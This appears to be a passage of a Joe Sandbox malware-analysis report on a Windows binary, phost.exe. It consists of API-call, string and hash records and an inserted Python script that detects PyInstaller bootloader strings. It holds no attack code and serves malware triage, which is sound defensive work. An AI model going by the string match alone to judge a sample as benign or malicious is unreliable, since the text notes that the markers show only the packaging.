• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 8ac83016c6d19718629361c98ce183280e134061d2f39cae6ebd349d7a60620e
• Instruction ID: 24ecff781c8b8fb6321770a5589483fa08ee505a70bf0e1b8ec60905d5b90bfd
• Opcode Fuzzy Hash: 8ac83016c6d19718629361c98ce183280e134061d2f39cae6ebd349d7a60620e
• Instruction Fuzzy Hash: EE419131B1865292EE11DB19AC14ABA63B8FF44BE4F544531ED0CCB799DE3CE109D742
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 32ddf84ba07bcb3af5be6c29ad821ee78a82dc1a13238bf059d4699f4c578f7a
• Instruction ID: d1bf3a5b8814cd65c2a3c458666f3e6fd8a579b5481355c22a6bd59ee45c8523
• Opcode Fuzzy Hash: 32ddf84ba07bcb3af5be6c29ad821ee78a82dc1a13238bf059d4699f4c578f7a
• Instruction Fuzzy Hash: B141BD32B0868295EF11DB299C105BA63B4FF447E8F448532ED0D8BB99DE3CE50AD702
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
• Instruction ID: 6b5883874fdbf95cbc6a56bf27c384b4b9a377c3baf5e8e752f0591ed8bea363
• Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
• Instruction Fuzzy Hash: 86D16173A087818AEF209B6998403AD37B8FB557A8F100139EE4D9FB95DF38E455D702
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72D63
• MessageBoxW.USER32 ref: 00007FF62CC72D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
• Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
• Instruction ID: 5cb3398ad9f424aa146925faefde9dfb6ede7b64bcaed7543a1209bf31bb40aa
• Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
• Instruction Fuzzy Hash: 6A31D832B08A4152EA20AB29AC146BB66B5FF84BE8F414136EF4DD7759DF3CD50AD301
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDBD
• GetLastError.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDCB
• LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDF5
• FreeLibrary.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DE63
• GetProcAddress.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DE6F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
• Instruction ID: c999403295026f7ed86a3d74d52f8c8c4901220a9f0d82ff47d6f98e20ee00d3
• Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
• Instruction Fuzzy Hash: DE31A321B1AB4291EE229B0AAC0057523F8FF58BB4F595535ED1D8B3C0EF3CE4499356
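The "Failed to extract %s: ..." and "[PYI-%d:ERROR]" strings listed in the records above are the PyInstaller bootloader's own error messages, which is what backs the report's "pyInstaller" verdict for phost.exe. The following triage helper is an added example, not code from the Joe Sandbox report or from PyInstaller: it searches a PE file or memory dump for exactly those strings (copied verbatim from the String ID entries above) and returns which ones are present. The UTF-16LE fallback search and the "two or more strings" threshold are this example's own assumptions; "api-ms-" is treated as weak evidence because it is generic CRT API-set loading code, not bootloader-specific.

```python
"""Added triage helper (not part of the Joe Sandbox report): locate the
PyInstaller bootloader format strings recorded in the disassembly metadata
above inside an arbitrary PE file or memory dump."""
import sys
from pathlib import Path

# Marker strings copied verbatim from the "String ID" entries above. They are
# emitted by PyInstaller's C bootloader when archive extraction or Python
# startup fails, so a binary carrying them embeds a PyInstaller runtime
# regardless of its icon, file name or version resource.
BOOTLOADER_MARKERS = (
    b"Failed to extract %s: failed to open archive file!",
    b"Failed to extract %s: failed to allocate data buffer (%u bytes)!",
    b"Failed to extract %s: failed to read data chunk!",
    b"Failed to extract %s: failed to seek to the entry's data!",
    b"[PYI-%d:ERROR]",
    b"<FormatMessageW failed.>",
)

# "api-ms-" is the prefix the CRT checks before LoadLibraryExW on a Windows
# API-set DLL; it is ordinary CRT code and only weak evidence on its own.
WEAK_MARKERS = (b"api-ms-",)

# Assumption: two or more bootloader-specific strings is a confident verdict.
MIN_STRONG_HITS = 2


def _present(marker: bytes, data: bytes) -> bool:
    """True if the marker occurs as narrow ASCII or (assumed) UTF-16LE."""
    if marker in data:
        return True
    return marker.decode("ascii").encode("utf-16-le") in data


def scan_pyinstaller_markers(data: bytes) -> dict:
    """Return the bootloader strings found in `data` and a verdict."""
    strong = [m.decode() for m in BOOTLOADER_MARKERS if _present(m, data)]
    weak = [m.decode() for m in WEAK_MARKERS if _present(m, data)]
    return {
        "bootloader_strings": strong,
        "weak_strings": weak,
        "is_pyinstaller": len(strong) >= MIN_STRONG_HITS,
    }


def scan_file(path: str) -> dict:
    """Scan a PE file or raw memory dump on disk."""
    return scan_pyinstaller_markers(Path(path).read_bytes())


# Constructed sample: junk padding around three of the marker strings, one of
# them wide, to stand in for a bootloader .text/.rdata section.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"Failed to extract %s: failed to open archive file!\x00"
    + b"\xcc" * 16
    + "[PYI-%d:ERROR]".encode("utf-16-le")
    + b"\x00" * 8
    + b"api-ms-win-core-file-l1-2-0\x00"
)


if __name__ == "__main__":
    target = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_pyinstaller_markers(SAMPLE_DUMP)
    for key, value in target.items():
        print(f"{key}: {value}")
```

Run it with a path argument to scan a real dump; without one it scans the constructed sample. A hit on the strong strings tells you only that the sample is a PyInstaller bundle, not what the bundled Python payload does; the next step is extracting the archive and decompiling the entry script.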
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                              • Instruction ID: f7066f966b33c59090be11c9848da9ef106e25ef8a964541b0c85e258afc640f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42419331B18A87D1EE11EB28EC141F96379FB443A4F804132EA5C8B695EF3CE519D742
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62CC7351A,?,00000000,00007FF62CC73F23), ref: 00007FF62CC72AA0
Strings
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
• Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
• Instruction ID: d3fef1ce9e8897e817482edb9f20a3440b9c169b6a742ec5d47762344a60bddb
• Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
• Instruction Fuzzy Hash: 27219132B18B8192EA209B55FC517E663A8FB887E4F404132EE8C97659DF3CD1498741
APIs
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
• Instruction ID: 1d315683a2c392e995dd6d41bc2069bde32595b1700e460346a4bee434b6e2be
• Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
• Instruction Fuzzy Hash: 7E214C30F0C65645FE6A67695E6593F51725F847F0F044738D93EC6AD6DE2CA4428303
APIs
Strings
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
• Instruction ID: 1b20762d8290de707d8bfdaacb36347c4d0dda70141b01bee13fbbf1d4457005
• Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
• Instruction Fuzzy Hash: 4B117231B18A4186EB608B5AAC6433972B0FB88BF8F004234D95DC7794DF7CD8148742
APIs
• GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78592
• K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC785E9
  • Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78678
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786E4
• FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786F5
• FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC7870A
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
• Instruction ID: 14c4aed2e1edbb137f0b8f72aa0ff2fcdbd1536768575b5cb22cfd846b2f31ee
• Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
• Instruction Fuzzy Hash: F2419322B1868241EE709B19A9406BA63B8FF84BE4F440135EF4DEBB89DE3CD445D702
APIs
• GetLastError.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B347
• FlsSetValue.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B37D
• FlsSetValue.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B3AA
• FlsSetValue.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B3BB
• FlsSetValue.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B3CC
• SetLastError.KERNEL32(?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA,?,?,?,?,00007FF62CC871FF), ref: 00007FF62CC8B3E7
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                              • Instruction ID: fe188e48bb0b2414946d9aedb3bc120f4bc6d9f62631fcf83e1756dacab17898
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5115C30B0C69286FE5667295EA593E61725F847F0F048734EA7EC67D6DE2CA4028303
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62CC71B6A), ref: 00007FF62CC7295E
                                                                                                                                                                                                                              Strings
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
• Instruction ID: bb1576f88803f31ef1732537805a7460079237122d8620a9963275537cd811d5
• Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
• Instruction Fuzzy Hash: AC31F633B18A8152EB209769AC506F762A5FF887E8F404132EE8DD7759EF3CD54A8301
APIs
Strings
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
• Instruction ID: 026af94ca820d1846e4d2910c61c247d5467c3c1d64e7b7c7aec636879526f17
• Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
• Instruction Fuzzy Hash: 4C315F72708A8289EF20DF29EC556FA6360FF88798F444135EA4D8BB49DF3CD1458702
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62CC7918F,?,00007FF62CC73C55), ref: 00007FF62CC72BA0
• MessageBoxW.USER32 ref: 00007FF62CC72C2A
Strings
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
• Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
• Instruction ID: 8e3ad889dfa7d18dc07bcfbf825d2b5b5390444d5c318433017314033fd26951
• Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
• Instruction Fuzzy Hash: 4F21AE73B08B4192EB219B19F8947AA63A8FB887D4F404136EE8D97759DE3CD209C741
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF62CC71B99), ref: 00007FF62CC72760
Strings
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
• Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
• Instruction ID: 1457340799cb50ff6dbfa9567e56d04423e5b2a8f7efdac5b2c88c96a9133c2a
• Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
• Instruction Fuzzy Hash: 2A219F32B18B8192EA20DB59FC517E663A4FB883E4F404132EE8C97659DF3CD2498741
APIs
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
• Instruction ID: 5054d2157f2c649cbe9c89ca6660fe5e3700ffc0b555789b5d6817999129cd0e
• Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
• Instruction Fuzzy Hash: 18F0AF71B19A0691EE248B28AC5973A5330AF84BB5F544235C66E865E8CF2CD444C302
APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: 35bef5cac66bbe2d7837c487f99ec243b5bf026781aae2c75bad09910fb4e982
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6114F62F5CA5301FF6E132CDC5637921646F5937CE08C634EA6E86AD6CE2DA981C107
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B41F
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B43E
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B466
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B477
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62CC8A613,?,?,00000000,00007FF62CC8A8AE,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8B488
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                              • Instruction ID: 82df2c030098c37c043c8bbc3591864a56ad55fd8824b363682cde47c25f1502
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20113A70F0C64245FE5AA72D5EA297B61625F847F0F488734E97EC6AD6DE2CA4028203
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                              • Instruction ID: 343d06dd44724ccdd77c97af3eaf179bb13f5ef5b94b0dbef03346bb8af9327c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09111870F0C24785FD6A666D5C6197B11624F453F0F444738DA3ECA2D3DE2DB4524253
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: 07b66756d860e6a00321df7a4c2dc61a50186ec795e5f134d52ede683c53e023
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8918132B08A4645EF66AE29D850BBF36B1AB40BE4F444335DA5AC73D6DF3CE4458302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
